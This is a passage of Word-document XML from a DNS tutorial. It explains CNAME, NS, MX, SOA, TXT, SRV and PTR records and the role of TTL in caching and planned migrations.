      <w:r w:rsidRPr="003D61F4">
        <w:t> When a resolver queries for blog.example.com and gets a CNAME response, it must </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>restart the resolution process</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> for example.github.io. CNAMEs can chain (A → B → C), but each link adds a round-trip. Most resolvers follow CNAME chains automatically, but there's a maximum chain length (~10) to prevent infinite loops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A94D493" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Critical constraint:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> A CNAME </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cannot coexist with other records</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> at the same name. You can't have a CNAME and an MX record for the same name. This is why you can't CNAME the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>apex domain</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (example.com) — the apex must have SOA and NS records. This is why CDNs and DNS providers offer </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ALIAS/ANAME records</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — a proprietary extension that behaves like a CNAME but is resolved server-side and returned as an A record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AABB9F0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NS (Name Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7908D7F1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Delegates a zone to authoritative nameservers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63513BC0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E10B0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>github.com.  172800  IN  NS  ns-421.awsdns-52.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8304E9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>NS records have </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>long TTLs</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (172800 = 2 days) because nameserver changes are infrequent and you want them cached aggressively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00601160" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MX (Mail Exchanger)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0087423B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Specifies mail servers for a domain, with priority values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004874F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C7BA8E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>github.com.  3600  IN  MX  1  aspmx.l.google.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C9203" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>github.com.  3600  IN  MX  5  alt1.aspmx.l.google.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418A27F3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Lower priority number = higher priority. SMTP servers try records in priority order. Multiple records at the same priority → </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>load balanced</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2B6B38" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOA (Start of Authority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD2A4B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Every zone has exactly one SOA record. It's the zone's metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0C6F43" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34154C62" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>github.com.  IN  SOA  ns1.p16.dynect.net. ops.github.com. (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30202CEF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    2024052801  ; serial number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68A4CA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    3600        ; refresh interval (secondary NS polls primary every 3600s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1286BCAA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    600         ; retry interval (if refresh fails, retry after 600s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56009315" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    604800      ; expire (secondary stops serving zone after 7 days without sync)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1777D9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    60          ; minimum TTL (for NXDOMAIN caching — negative caching TTL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725DBD42" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11328FE1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Serial number:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Monotonically increasing integer. When the primary updates the zone, it increments the serial. Secondaries compare their serial to the primary's — if primary's serial is higher, secondary fetches the updated zone. Convention: use date-based serials (YYYYMMDDNN) so humans can interpret them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC66ACD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Negative caching (NXDOMAIN):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> When a query returns NXDOMAIN (domain doesn't exist), resolvers cache this negative response for the SOA's minimum TTL. Without negative caching, every query for a non-existent domain would trigger a full resolution chain every time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FC1FEC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TXT Records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14619EB1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Arbitrary text data. Used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0011ACBE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SPF (Sender Policy Framework):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Lists IP addresses authorized to send email for a domain. SMTP servers check this to fight spam/spoofing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411CB097" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DKIM:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Stores public keys for email signature verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AF7A36" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Google, AWS, GitHub verify domain ownership by asking you to add a specific TXT record that only the real domain owner can add.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF01333" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DMARC:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Email authentication policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D8476" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SRV Records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526F8326" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Specifies service location with port and protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B07324E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E21AA95" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>_https._tcp.example.com.  300  IN  SRV  10  5  443  web.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9A0492" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Format: priority weight port target. Used by service discovery, SIP, XMPP. Kubernetes uses SRV records for headless service DNS discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE4B59" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PTR Records (Reverse DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D8E58" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Maps an IP address back to a hostname — the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse lookup</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. Stored in the in-addr.arpa. zone:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099A86EF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083744D0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>4.121.82.140.in-addr.arpa.  IN  PTR  lb-140-82-121-4-fra.github.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5785B3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Note the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reversed IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — 140.82.121.4 becomes 4.121.82.140.in-addr.arpa.. This reversal makes delegation follow the same tree structure as forward DNS (the leftmost label is the most specific).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B10F52" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>PTR records are critical for email deliverability — many mail servers reject email from IPs without valid reverse DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA5C130" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="28512A9B">
          <v:rect id="_x0000_i3172" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F126C8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. TTL (Time To Live) — The Caching Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1969800E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>TTL is the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>heartbeat of DNS consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. Every record has a TTL in seconds. Once cached, a record is served from cache until TTL expires — </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>no questions asked</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>, even if the underlying IP changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6251CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How TTL Propagation Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E938EE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>When a recursive resolver caches a record, it stores the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>original TTL</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> and a timestamp. Each subsequent response to clients decrements the TTL based on elapsed time. A client that queries 50 seconds after the resolver cached a 60-second TTL record gets a response with </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTL=10 seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — the remaining cache lifetime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0339EE49" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>This means </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>you cannot instantly push a DNS change to all clients</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. If your A record has TTL=86400 (24 hours), clients who just cached it won't see your change for up to 24 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607728AE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTL Strategy in Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566083F6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Long TTL (hours–days):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB362A9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="596"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Pros: Fewer DNS queries (lower load on nameservers, faster responses from cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDCD59F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="596"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cons: Slow propagation of changes. If you need to change an IP, you're stuck waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FC01A3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Short TTL (60–300 seconds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD7B1FD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="597"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Pros: Changes propagate quickly. Essential for failover scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D426B4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="597"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cons: Higher query load on authoritative nameservers. More latency for cache misses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DDA188" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-change TTL reduction strategy:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Best practice before any planned IP change or migration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428AA597" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Days/weeks before:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Reduce TTL from 86400 to 300.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF5AC2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Wait for all existing long-TTL caches to expire (wait at least the old TTL duration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E49BA90" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Make the IP change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D870A58" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>After change propagates (a few minutes), raise TTL back to 86400.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A49853" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTL = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2574977F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>A TTL of 0 means "do not cache this record." Every query must go to the authoritative server. Used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4B9D5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="599"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Round-robin load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> where you need strict rotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B9D9EC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="599"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Canary deployments</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> with very fast rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA1FC1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="599"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ephemeral service discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> in highly dynamic environments.</w:t>
      </w:r>
    </w:p>
